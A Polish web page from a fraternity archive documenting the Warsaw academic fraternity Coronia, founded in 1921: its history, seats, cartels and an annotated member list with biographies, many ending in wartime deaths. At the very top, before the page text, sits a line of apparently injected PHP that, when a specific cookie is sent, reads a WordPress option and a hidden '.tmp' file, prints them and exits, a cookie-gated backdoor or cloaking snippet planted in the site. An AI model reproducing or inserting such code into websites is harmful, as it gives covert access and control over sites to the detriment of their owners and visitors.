if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Coronia

Dekiel Coronii - vide Poszukiwania. Nazwa:
Akademicka Korporacja Coronia
Siedziba:
Warszawa
Data powstania:
17 XII 1921 r.
Barwy:
czarna – złota – purpurowa
Dewiza:
„Sapienter et fortiter” („Mądrze i dzielnie”)

Rys historyczny

Coronia, Warszawa prawd. koniec lat 20-tych.

Coronia została założona przez grupę 14 studentów uczelni warszawskich dnia 17 XII 1921 r. Większość założycieli była wychowankami gimnazjów Kulwiecia i Pankiewicza. Korporacja miała charakter międzyuczelniany, ale przeważali w niej studenci Uniwersytetu. W latach 30-tych zaczęli dominować słuchacze Wydziału Weterynaryjnego.

Od 1922 r. Coronia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 5 XII 1922 r.). Kandydowała pod opieką K! Sarmatia. Prawa członka rzeczywistego Związku uzyskała w 1922 r. (1923 r. ?). W latach 1933-38 pozostawała poza strukturami Związku.

Coronia, Warszawa prawd. koniec lat 20-tych.

Koło Filistrów powstało w 1924 r., a dnia 21 IV 1925 r. poświęcony został w kościele ss. Wizytek sztandar korporacji.

Dnia 30 V 1926 r. zawarła kartel na pięć lat z K! Varsovia.

Kuratorem korporacji z ramienia uniwersyteckiego Senatu był początkowo prof. Jan Namitkiewicz, a od 1928 r. prof. Eugeniusz Wajgiel. Siedziby Coronii znajdowały się: początkowo przez wiele lat w drugim filarze Mostu Poniatowskiego (wspólnie z K! Varsovia), w latach 1931-33 przy ul. Wilczej 47/49 m. 44, następnie przy ul. Filtrowej 67, ul. Chocimskiej 3, ul. Czerwonego Krzyża 3, a w latach 1935-39 przy ul. Filtrowej 83.

Prezydium Coronii, Warszawa prawd. 1929 r.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 132 nazwiska, w tym jedenastu członków honorowych.

Coroniarze, Warszawa prawd. koniec lat 20-tych.

Po wojnie odbywały się spotkania członków korporacji. Dnia 10 VI 1989 r. w kruchcie kościoła akademickiego pw. św. Anny przy Krakowskim Przedmieściu w Warszawie odsłonięto tablicę poświęconą pomordowanym, poległym i zmarłym członkom Coronii. W 1996 r. korporacja została reaktywowana, jednak po 1998 r. zanikła

Lista członków

Poniższa, niekompletna lista członków Coronii obejmuje 132 nazwiska. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Borkowski, Filister honorowy Coronii
 2. Władysław Jabłoński, (2 października 1872 w Warszawie - 21 września 1952 w Warszawie) studiował architekturę w Petersburgu i Wiedniu, inż. architekt, naczelnik Wydziału Technicznego Zarządu Miejskiego Warszawy, następnie naczelny inżyniera Warszawy, prezydent Warszawy 1922-27, Filister honorowy Coronii
 3. Stanisław Moskalewski, (28 kwietnia 1876 w Sieprawkach k. Garwolina - 6 września 1936 w Poznaniu) ze zubożałej rodziny szlacheckiej, s. Feliksa, polityk Narodowej Demokracji, działacz państwowy i społecznik, wojewoda lubelski 1919-26, równolegle nadzwyczajny komisarz oszczędnościowy przy Prezesie Rady Ministrów 1923-26, zdymisjonowany ze stanowiska wojewody po przewrocie majowym, od 1928 prezes Polskiego Czerwonego Krzyża w Poznaniu, Filister kooptowany (honorowy) ? Corony, Filister honorowy Coronii, odznaczony Krzyżem Komandorskim OOP 1922
 4. Jan Namitkiewicz, (23 maja 1880 w Lublinie - 11 kwietnia 1958 w Łodzi) s. Justyna i Marii, prawd. ojciec Jana (Coronia), prawnik, adwokat, prof. Wydziału Prawa UW, Filister honorowy Coronii, pochowany na warszawskich Powązkach
 5. Zygmunt Słomiński, (15 kwietnia 1879 w Piotrkowie Trybunalskim - 12 lutego 1943 w Stefanowie k. Piaseczna) inż. budownictwa, naczelnym inżynier Warszawy 1924-27, prezydent Warszawy 1927-34, ustąpił z urzędu po zmianie ustawy samorządowej, w 1934 dyrektor tramwajów miejskich, później na emeryturze, Filister honorowy Coronii, w listopadzie 1942 aresztowany przez Niemców, więziony na Pawiaku i na Szucha, rozstrzelany za budynkiem stacji kolei wąskotorowej w Stefanowie, jego symboliczny grób znajduje się na warszawskich Powązkach
 6. Jan Sosnowski, (26 stycznia 1876 - 24 czerwca 1938) wykładowca fizjologii zwierząt na Wydziale Rolniczym Wyższej Szkoły Rolniczej 1916-1918, od 1918 prof. zoologii i fizjologii zwierząt w SGGW, rektor SGGW 1923-25 oraz 1932-33, badacz zagadnień z zakresu przemiany materii, fizjologii mięśni i nerwów, współzałożyciel Towarzystwa Naukowego Warszawskiego, Filister honorowy Varsovii i Coronii
 7. Jan Szmigielski, ksiądz katolicki, dr, Filister honorowy Coronii
 8. Zygmunt Uszycki, dr med., Filister honorowy Coronii
 9. Wincenty Wabia Wabiński, jubiler w Warszawie, Filister honorowy Coronii
 10. Eugeniusz Aleksander Franciszek Wajgiel, (1888 [1873?] - 1944 w Warszawie) prof. i dziekan 1929/30 i 1935/36 Wydziału Weterynarii UW, Filister honorowy Coronii, zginął w Powstaniu Warszawskim
 11. Jerzy Zawadzki, dr med., założyciel pogotowia ratunkowego w Warszawie, Filister honorowy Coronii

Członkowie rzeczywiści

 1. Stanisław Affeltowicz, student WSH, c. 1924, akt. 1924-31
 2. Czesław Ahrends, (1915 - ) student weterynarii UW, c. 1935, lekarz weterynarii, po wojnie na emigracji w Maroku
 3. Zbigniew Augustynowicz, założyciel Coronii, akt. 1921-26, prezes sem. let. 1925/26
 4. Stanisław Baranowski, student UW, c. 1931, akt. 1931-33
 5. Czesław Barański, student UW, c. 1929, akt. 1929-30
 6. Jan Bielawski, student medycyny UW, c. 1932, akt. 1932-33
 7. Henryk Bieńkowski, student UW, od 1928 USB, c. 1924, akt. 1924-31
 8. Wojciech Bieńkowski, student WSH, c. 1925/26, akt. 1925/26-33, wiceprezes sem. let. 1927/28
 9. Jan Biernawski, (1910-1976) student PW, c. 1930, akt. 1930-33, sekretarz sem. zim. 1932/33
 10. Władysław Błotnicki, student SGGW, od 1931 WSH, założyciel Coronii, akt. 1921-32, olderman sem. zim. 1924/25, olderman sem. let. 1928/29, prezes sem. zim. 1931/32
 11. Daniel Boguszewski, student i absolwent 1950 weterynarii UW, c. 1935
 12. Stanisław Borkowski, student UW, c. 1931, akt. 1931-33
 13. Aleksander Breżezowski, student UW, c. 1927, akt. 1927-33
 14. Antoni Brzozowski, student UW, c. 1927, akt. 1927-30
 15. Wacław Brudnicki, założyciel Coronii, akt. 1921-25
 16. Tadeusz Cegłowski, ( - 1939-45) student weterynarii UW, c. 1921, aresztowany przez Gestapo i osadzony w obozie koncentracyjnym, zginął w nieznanych okolicznościach

  Jan Chomiczewski, 1930 r.

 17. Jan Chomiczewski, (19 listopada 1909 w Siemiatyczach - 1992) s. Józefa Kaliksta (lekarza) i Julii z Biernawskich (lekarza dentysty), uczeń gimnazjów w Białymstoku, Warszawie i Siedlcach, Korpusu Kadetów w Modliwie, Radzyniu Podlaskim, gdzie uzyskał maturę 1930, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołńskim 1928/29, ppor. rez. 1932, por. rez. 1936, student matematyki UW 1929/30, a następnie student i absolwent med. UW 1930-37, c. 1930, akt. 1930-33, wiceprezes zewn. sem. zim. 1932/33, po odbyciu praktyki w szpitalach warszawskich, w 1938 powolany do wojska do sluzby zasadniczej, w wojnie obronnej 1939 w 26 Dywizji Piechoty dowódca IV plutonu (przeciwgazowego), wzięty do niewoli pod Bzurą, zwolniony w grudniu 1939, w czasie okupacji w Warszawie, pracował w ambulatorium przy Stołecznym Komitecie Samopomocy Społecznej, a od 1940 w Miejskim Instytucie Higieny, członek konspiracyjnej grupy dywersyjnej “Prus”, która weszła w skład ZWZ-AK, przydzielony do służby zdrowia Kedywu “Rola” ps “Pobożański”, brał udział w akcjach zbrojnych na terenie Warszawy i okolic, w 1943 odznaczony Srebrnym Krzyżem Zasługi z Mieczami, a w lipcu 1944 awansowany do stopnia kapitana, w powstaniu warszawskim w zgrupowaniu Radosława, najpierw wraz ze swoim oddziałem na ul. Okopowej, a następnie w szpitalu polowym na bazie szpitala im. Karola i Marii, po zajęciu przez Niemców uniknął rozstrzelania i został skierowany do szpitala Wolskiego, gdzie opiekował się rannymi i chorymi w czasie ewakuacji ludności Warszawy, w 1945 powołany ponownie do wojska w stpniu majora i przydzielony na stanowisko bakteriologa do Sanitarno-Epidemiologicznego Laboratorium Frontu WP, awansowny do stopnia ppor. 1946, dr med. UW 1946, zwolniony ze służby wojskowej w 1952, od 1950 zatrudniony w Zakładzie Bakteriologii AM w Łodzi, od 1961 w Klinice Chorób Zakaźnych AM, od 1954 pracował także w Wojskowej Stacji Sanitarno-Epidemiologicznej w Łodzi, doc. mikrobiologii 1962, kierownik Katedry Mikrobiologii Lekarskiej WAM 1962-73, od 1962 ponownie w służbie zasadniczej, awansowany do stopnia pułkownika, komendant (dziekan) Wydziału Lekarskiego WAM 1964-71, prof. nadzw. 1968, od 1973 na emerturze, kierownik Zakładu Bakteriologii i Immunologii Wydziału Lekarskiego AM w Łodzi 1976-1980, autor ok. 100 publikacji naukowych, członek m.in. Komitetu Mikrobiologii PAN, Polskiego Towarzystwa Mikrobiologów (Członek Honorowy Towarzystwa 1976), Polskiego Towarzysttwa Lekarskiego, Polskiego Towarzystwa Epidemiologów i Lekarzy Chorób Zakaźnych, Polskiego Towarzystwa Historii Medycyny, współzałożyciel Łódzkiego Klubu Jeździeckiego, odznaczony m.in. Krzyżem Walecznych, Krzyżem Armii Krajowej, Warszawskim Krzyżem Powstańczym, Krzyżem Partyzanckim, Krzyżem Kawalerskim OOP, dr honoris causa WAM 1990, pochowany z ceremoniałem wojskowym na cmentarzu wojskowym na Dołach w Łodzi

 18. Stanisław Chronowski, student UW, student PW (1930), c. 1929, akt. 1929-33
 19. Włodzimierz Chwilczyński, student UW, c. 1925/26, akt. 1925/26-31
 20. Eugeniusz Cmelik (Čmelik,Czmelik), student PW, c. 1930, akt. 1930-33
 21. Marian Czarnopyś, student i absolwent 1939 weterynarii UW, c. 1934
 22. Henryk Czerwiński, student weterynarii UW, c. 1936
 23. Wiesław Dworczyński, student i absolwent 1947 weterynarii UW, c. 1936
 24. Wojciech Dziewulski, student WSH, c. 1927, akt. 1927-29
 25. Jerzy Fuglewicz, student WSH, c. 1925/26, akt. 1925/26-29, sekretarz sem. let. 1927/28
 26. Józef Giaro, (1903 - 1966 w Belgii) brat Kazimierza (Coronia), student PW, c. 1925, akt. 1925-29, olderman, po wojnie na emigracji w Belgii
 27. Kazimierz Giaro, (1905 - 7 kwietnia 1993) brat Józefa (Coronia), student PW, c. 1927, akt. 1927-33, w czasie wojny w konspiracji w AK
 28. Tadeusz Grabowski, ( - po 1945), student i absolwent 1951 weterynarii UW, c. 1934
 29. Witold Graniszewski, student UW, założyciel Coronii, akt. 1921-26
 30. Stanisław Oleksy-Gray, student weterynarii UW, c. 1935, kontynuował studia w Edynburgu, po wojnie na emigracji w Wielkiej Brytanii
 31. Eugeniusz Grosser, student PW, c. 1924/25, akt. 1924/25-30, prezes sem. let. 1928/29, prezes sem. let. 1929/30
 32. Władysław Holtzman, student WSH, c. 1929, akt. 1929-32, olderman sem. zim. 1931/32, prezes sem. zim. 1932/33
 33. Jan Homan, ( - 1940) student WSH, c. 1927, akt. 1927-31, wiceprezes sem. let. 1928/29, zginał w bitwie o Anglię jako pilot PSZ-RAF
 34. Adam Jaszczuk, student UW, c. 1927, akt. 1927-31
 35. Bohdan Jeziorski, ( - 1939-45) student UW, c. 1927, akt. 1927-28, aresztowany w Warszawie przez Gestapo, zesłany do obozu koncentracyjnego w Majdanku, tam zamordowany
 36. Jerzy Zbigniew Kaczanowski, student weterynarii UW, c. 1935, pozostał na emigracji w Niemczech

  Bolesław Kalinowski, 1926 r.

 37. Bolesław Włodzimierz Kalinowski, (1907 - 1947 w Lublinie) student i absolwent 1934 weterynarii UW, c. 1927, akt. 1927-33, wiceprezes sem. zim. 1930/31, ukończył Szkołę Podchorążych Rezerwy w Grudziądzu, w czasie wojny aresztowany w Lublinie, osadzony w obozie koncentracyjnym w Oranienburgu, gdzie spędził pięć lat

 38. Jan Kamiński, student weterynarii UW, c. 1933
 39. Tadeusz Kamiński, (1913 - ) student weterynarii UW, c. 1934, kontynuował studia w Bolonii, dr weterynarii, pozostał na emigracji we Włoszech
 40. Ryszard Kaszubski, student UW, c. 1928, akt. 1928-33
 41. Alfred Klimkiewicz, (7 sierpnia 1905 w Biłgoraju - 1988) student i absolwent 1934 med. UW, c. 1927 (?), akt. 1927-33, sekretarz sem. let. 1929/30, internista
 42. Jerzy Zbigniew Kochanowski, student weterynarii UW, c. 1935, po wojnie na emigracji w Niemczech
 43. Stanisław Konopka, student UW, założyciel Coronii, akt. 1921-30, sekretarz sem. zim. 1924/25
 44. Janusz Koreywo, założyciel Coronii
 45. Stefan Kostelecki, (1905 - 9 października 1994) student WSH, c. 1925, akt. 1925-31, sekretarz sem. let. 1928/29, wiceprezes sem. let. 1928/29, bankowiec
 46. Stanisław Kowalski, (1912 - 5 lutego 2002 w Warszawie) student weterynarii UW, student i absolwent weterynarii UWr.c. 1935, działacz akademicki i narodowy, pochowany na Cmentarzu Bródnowskim
 47. Zygmunt Kozanecki, student UW, założyciel Coronii, akt. 1921-26
 48. Walter Kożdoń, student WSH, c. 1929, akt. 1929-33

  Zenon Kópczyński, prawd. koniec lat 20-tych.

 49. Zenon Kópczyński, (1905-1986) student UW, c. 1924/25, akt. 1924/25-26, prawnik, sędzia Sądu Najwyższego

 50. Mieczysław Kuczyński, (28 stycznia 1906 w Krynicznej na Ukrainie - 1940 w Katyniu) s. Jana i Jadwigi z Tyszków, student i absolwent budowy dróg i mostów PW, c. 1927/28, akt. 1927/28-33, od 1936 pracował w kierownictwie Robót Fortyfikacyjnych nr 13 Sarny Kostopol, absolwent Szkoły Podchorążych Rezerwy Piechoty, ppor. rez., przydzielony do 21 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 51. Stanisław Kudelski, student WSH, student SNP, c. 1927, akt. 1927-33, sekretarz sem. let. 1928/29, sekretarz WKM-u sem. zim. 1931/32
 52. Czesław Lachert, student WSH, c. 1927
 53. Roman Leonowicz, student UW, c. 1929/30, akt. 1929/30-32
 54. Karol Luft, student UW, c. 1932, akt. 1932-33
 55. Jerzy Machnikowski, student i absolwent 1938 weterynarii UW, c. 1932, prezes Koła Medyków Weterynaryjnych 1934/35
 56. Józef Marchowiecki, (1914-1972) student weterynarii UW, c. 1934
 57. Jerzy Mathia, student weterynarii UW, c. 1929, akt. 1929-33, sekretarz sem. zim. 1931/32
 58. Janusz Michel, student weterynarii UW, c. 1937
 59. Stanisław Mielczarski, ( - 1939 nad Bzurą) student PW, c. 1924, akt. 1924-33, sekretarz sem. let. 1925/26, w kampanii wrześniowej poległ nad Bzurą
 60. Tadeusz Moskalewski, student PW, założyciel Coronii, akt. 1921-28, wiceprezes sem. zim. 1924/25, prezes [prawd. Tadeusz Moskalewski (30 kwietnia 1903 w Bełchatowie - 27 lutego 1984) s. Czesława i Marii z d. Seelig, nestor i pionier polskiego przemysłu kablowego oraz jego organizator po II wojnie światowej]
 61. Bogusław Myszkorowski, student WSH, c. 1931, akt. 1931-32
 62. Tadeusz Naczas, student weterynarii UW, c. 1936
 63. Jarosław Naleszkiewicz, założyciel Coronii, akt. 1921-25, wiceprezes sem. let. 1925/26, prezes
 64. Jan Namitkiewicz, prawd. s. Jana (Coronia), student UW, c. 1929, akt. 1929-30
 65. Albin Niewiarowski, student weterynarii UW, c. 1933
 66. Remigiusz Niewiarowski, student weterynarii UW, c. 1935
 67. Jerzy (Ostoja-) Obiedziński, (25 marca 1908 - maj 1980 w Chicago) s. Jana i Marianny Józefy ze Zdunowskich, student SNP, c. 1931, akt. 1931-33, po wojnie na emigracji, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 68. Władysław Olczakowski, c. 1924, akt. 1924-25
 69. Franciszek Olszak, student UW, c. 1936
 70. Roman Orłowski, student PW, c. 1924, akt. 1924-26
 71. Konstanty Osmólski, student PW, c. 1930, akt. 1930-31
 72. Tadeusz Pakowski, student i absolwent 1939 weterynarii UW, c. 1933
 73. Czesław Pawłowski, student UW, c. 1927, akt. 1927-29
 74. Stanisław (Stefan?) Pawłowski, ( - październik 1994) c. 1933
 75. Piotr Pejta, student SGGW, c. 1930, akt. 1930-31
 76. Aleksander Pikulski, (12 grudnia 1909 w Wilczycach w pow. sandomierskim - 1940 w Katyniu) s. Edwarda i Józefy z Leskowskich, student weterynarii UW, c. 1932 (?), olderman, słuchacz Szkoły Podchorążych Rezerwy Artylerii, pchor. rez., przydzielony do 2 Pułku Artylerii Lekkiej Legionów, w niewoli sowieckiej, zamordowany przez NKWD
 77. Stefan Pikulski, student weterynarii UW, c. 1933
 78. Andrzej Piłko, student PW, c. 1929, akt. 1929-33
 79. Bronisław Piotrowski, student WSH, akt. 1928-33, II wiceprezes wewn. sem. zim. 1932/33
 80. Tadeusz Platé, student PW, c. 1928/29, akt. 1928/29-33
 81. Kazimierz Pogorzelski, student UW, c. 1932, akt. 1932-33, po wojnie prawd. na emigracji w Wielkiej Brytanii
 82. Eugeniusz Polak, student SGGW, c. 1929, akt. 1929-33, sekretarz sem. zim. 1930/31
 83. Jerzy Pulikowski, student i absolwent 1939 weterynarii UW, c. 1934, prezes, dwukrotny prezes Koła Medyków Weterynaryjnych 1936/37 oraz 1937/38
 84. Kazimierz Raczyński, student UW, c. 1925/26, akt. 1925/26-30
 85. Józef Radoła, student WSH, c. 1927
 86. Czesław Rayski, student i absolwent 1940 weterynarii UW, c. 1933, olderman

  Konrad Rozwadowski, 1995 r.

 87. Konrad Rozwadowski, (19 lutego 1914 w Warszawie - 11 lipca 1998 w Warszawie) absolwent Gimnazjum im. Adama Mickiewicza w Warszawie 1932, harcmistrz 3 WDH, student i absolwent 1940 weterynarii UW, c. 1933, prezes Coronii, prezes Koła Medyków Weterynaryjnych 1935/36, autor tekstu “Szkic historyczny Polskiej Korporacji Akademickiej Coronia” (Polskie Korporacje Akademickie 1995, nr 10, s. 68 i n.), dwukrotny prezes Stowarzyszenia Filistrów Polskich Korporacji Akademickich 1993-95 oraz 1995-97, inicjator reaktywacji Coronii na Wydziale Weterynaryjnym SGGW, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA (pośmiertnie 1999)

 88. Tadeusz Sawicki, student UW, c. 1930, akt. 1930-33

  Tadeusz Scharmach, lata 20-te.

 89. Tadeusz Scharmach, (30 maja 1902 w Warszawie - 22 marca 1972 w Warszawie) s. Stanisława i Wandy z d. Paryczko, absolwent Gimnazjum im. Adama Mickiewicza w Warszawie 1920, student i absolwent 1924 prawa UW, student historii Wydział Filozoficzny UW 1924-28, założyciel Coronii, akt. 1921-25, statystyk ZPKA 1924-25 (III kadencja), sekretarz Prezydium Rady Ministrów w rządzie Kazimierza Bartla, w 1928 sekretarz Prezydenta m.st. Warszawy, adwokat, w czasie II wojny światowej w 1943 więzień Pawiaka, po wojnie radca prawny i adwokat, działacz i publicysta filatelistyczny, odznaczony złotą odznaką Polskiego Związku Filatelistów 1957, pochowany na cmentarzu Ewangelicko-Augsburskim przy ul. Młynarskiej w Warszawie (aleja E) [Źródła (poza wskazanymi poniżej spisu członków): relacja Jana Scharmacha]

 90. Oskar Schmidt, student UW, c. 1928, akt. 1928-33, olderman sem. zim. 1932/33
 91. Otton Schmidt, student UW, c. 1932, akt. 1932-33
 92. Kazimierz Sielski, student PW, c. 1928, akt. 1928-31
 93. Ryszard Skanderbeck-Csáky, student UW, c. 1924, akt. 1924-29, prezes
 94. Włodzimierz Skarzyński, c. 1924, akt. 1924-26
 95. Juljan Skowierzak, student WSH, c. 1928, akt. 1928-31, olderman 1929/30
 96. Józef Słowikowski, student WSH, c. 1927
 97. Jerzy Smoczarski, student weterynarii UW, c. 1936
 98. Witold Smulski, (3 maja 1913 w Dąbrowie Górniczej -1974) student med. UW, student i absolwent 1951 med. UJ, c. 1934

  Wincenty Sobociński, lata 20-te.

 99. Wincenty Sobociński, student WSH, akt. 1928-30, olderman sem. let. 1927/28, prezes sem. let. 1928/29, olderman sem. zim. 1930/31 (jako filister)

 100. Wacław Sokołowski, c. 1924, akt. 1924-25
 101. Wacław Sołtyński, ( - 1939-44) student UW, c. 1924, akt. 1924-31, prezes sem. let. 1927/28, aresztowany w Warszawie przez Gestapo, zamordowany w więzieniu na Pawiaku
 102. Józef Spryszyński, (1 października 1907 w miejsc. Kłóbka-Podgórze - 1940 w Charkowie) s. Jana i Marianny z Brodeckich, student i absolwent 1937 weterynarii UW, c. 1932, prezes Koła Medyków Weterynaryjnych 1933/34, absolwent Szkoły Podchorążych Rezerwy Piechoty 1930, ppor. rez. piechoty, przydzielony do 14 Pułku Piechoty, w wojnie obronnej 1939 dowódca kompanii w 74 (77 ?) Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 103. Leon Stachórski, student SGGW, c. 1928, akt. 1928-31
 104. Napoleon Stankiewicz, student PW, c. 1928, akt. 1928-33
 105. Roman Szeffer, student SGGW, c. 1929, akt. 1929-33, wiceprezes sem. zim. 1931/32, skarbnik WKM-u sem. zim. 1931/32, prezes

  Zygmunt Szparkowski, 1930 r.

 106. Zygmunt Piotr Szparkowski, (26 listopada 1902 w Nasielsk - 8 lipca 1988 we Wrocławiu) s. Leonarda i Józefy z d. Falkowska, absolwent Gimnazjum Kulwiecia w Warszawie, student i absolwent Wydziału Elektrycznego PW, założyciel Coronii, akt. 1921-30, olderman sem. let. 1925/26, po studiach dyrektor departamentu w Warszawie, uczestnik wojny obronnej 1939, odznaczony Krzyżem Walecznych, w czasie okupacji w AK, współdziałał w wytwórni amunicji i sprzętu łącznościowego we własnym warsztacie elektryczno-mechanicznym przy ul. Chłodnej, za udział w konspiracji odznaczony powtórnie Krzyżem Walecznych, po wojnie organizator Poczty Polskiej na terenie Dolnego Śląska, dyrektor Poczt i Telegrafów Okręgu Warszawskiego 1945-46, dyrektor firmy Grupa Techniczna Oddziału Wrocławskiego 1946-49, prof. PWr., wieloletni dziekan Wydziału Teletechniki, a następnie Wydziału Łączności, wieloletni prorektor i rektor PWr., doctor honoris causa Politechniki w Dreźnie, Instytutu Technicznego w Kijowie oraz PWr., pochowany na Cmentarzu św. Wawrzyńca we Wrocławiu

 107. Ksawery Szwarc, ( - 1940/41? w Kownie) student UW, założyciel Coronii, akt. 1921-26, zmarł w niewyjaśnionych okolicznościach podczas okupacji sowieckiej
 108. Stefan Szymański, c. 1924, akt. 1924-26
 109. Czesław Tarasiewicz, student PW, c. 1928, akt. 1928-33, wiceprezes WKM-u sem. zim. 1931/32
 110. Jan Tenderenda, student weterynarii UW, c. 1935
 111. Władysław Uszycki, student UW, c. 1925/26, akt. 1925/26-33, sekretarz
 112. Zygmunt Uszycki, student i absolwent 1933 weterynarii UW, c. 1927, akt. 1927-33, wiceprezes sem. let. 1929/30, prezes sem. zim. 1930/31, prezes WKM-u sem. zim. 1931/32, ppor. rez., w wojnie obronnej 1939 w 26 Dywizjonie Artylerii Ciężkiej
 113. Władysław Wall, student UW, c. 1930, akt. 1930-33
 114. Marian Westwal, student weterynarii UW, c. 1937
 115. Mirosław Westwal, student weterynarii UW, c. 1937
 116. Jerzy Wiszniowiecki, student i absolwent 1936 weterynarii UW, c. 1932, olderman
 117. Witold Wize, ( - 1 sierpnia 1944 w Warszawie) student PW, założyciel Coronii, akt. 1921-29, zginął od odłamka pocisku artyleryjskiego
 118. Jerzy Wołk-Łaniewski, student WSH, c. 1929, akt. 1929-31
 119. Mirosław Wysocki-Odrowąż, student WSH, c. 1929, akt. 1929-33
 120. Stanisław Zalewski, c. 1924, akt. 1924-25
 121. Stanisław Kazimierz Zawadzki, (27 lutego 1901 w Łodzi - 1940 w Katyniu) założyciel Coronii, akt. 1921-25, prezes sem. zim. 1924/25, prawnik, por. rez., w wojnie obronnej 1939 w 56 Pułku Piechoty, w niewoli rosyjskiej, zamordowany przez NKWD

Listę członków opracowano na podstawie:

1) Konrad Rozwadowski, Lista członków Polskiej Korporacji Akademickiej Coronia (Warszawa), (w:) Polskie Korporacje Akademickie 1995, nr 10, s. 36 i n.,
2) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Coronia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 3 IX 2010 r.
Ostatnia zmiana: 18 XI 2014 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Akademicka Korporacja Coronia (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 18 XI 2014 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }